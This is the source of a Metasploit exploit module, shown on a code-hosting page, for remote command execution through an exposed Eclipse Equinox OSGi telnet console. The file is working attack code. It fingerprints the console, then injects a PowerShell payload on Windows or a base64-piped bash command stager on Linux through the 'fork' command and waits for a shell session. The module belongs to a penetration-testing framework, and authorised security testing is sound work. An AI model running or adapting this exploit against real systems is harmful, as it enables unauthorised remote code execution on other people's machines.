Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
31205 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5
require 'base64'

6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = NormalRanking

9


10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::CmdStager

12
  include Msf::Exploit::Powershell

13


14
  TELNET_IAC = Msf::Exploit::Remote::Telnet

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Eclipse Equinox OSGi Console Command Execution',

21
        'Description' => %q{

22
          Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console

23
          'fork' command to execute arbitrary commands on the remote system.

24
        },

25
        'Author' => [

26
          'Quentin Kaiser <[email protected]>'

27
        ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']

31
        ],

32
        'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],

33
        'Targets' => [

34
          [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],

35
          [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]

36
        ],

37
        'CmdStagerFlavor' => [ 'bourne' ],

38
        'DisclosureDate' => '2018-02-13',

39
        'DefaultTarget' => 0,

40
        'Notes' => {

41
          'Reliability' => UNKNOWN_RELIABILITY,

42
          'Stability' => UNKNOWN_STABILITY,

43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

44
        }

45
      )

46
    )

47
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')

48
    register_options([

49
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])

50
    ])

51
  end

52


53
  def check

54
    connect

55
    res = sock.get_once

56
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \

57
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \

58
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \

59
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE

60
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72

61
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \

62
        "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)

63
      res = sock.get_once

64
    end

65
    disconnect

66
    if res && res == 'osgi> '

67
      return Exploit::CheckCode::Vulnerable

68
    end

69


70
    Exploit::CheckCode::Safe

71
  end

72


73
  def exploit

74
    print_status('Accessing the OSGi console ...')

75


76
    unless check == Exploit::CheckCode::Vulnerable

77
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")

78
    end

79


80
    if target['Platform'] == 'win'

81
      exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")

82
    else

83
      execute_cmdstager({ flavor: :bourne })

84
    end

85


86
    print_status("#{rhost}:#{rport} - Waiting for session...")

87


88
    (datastore['TIME_WAIT']).times do

89
      Rex.sleep(1)

90
      # Success! session is here!

91
      break if session_created?

92
    end

93
  rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e

94
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")

95
  ensure

96
    disconnect

97
  end

98


99
  def exec_command(cmd)

100
    connect

101
    res = sock.get_once

102
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \

103
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \

104
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \

105
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE

106
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \

107
        "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)

108
      sock.get_once

109
    end

110
    print_status('Exploiting...')

111
    sock.put("#{cmd}\r\n")

112
    sock.get

113
    sock.put("disconnect\r\n")

114
    sock.get

115
    sock.put("y\r\n")

116
  end

117


118
  def execute_command(cmd, _opts = {})

119
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, '')

120
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.

121
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")

122
  end

123
end

124


125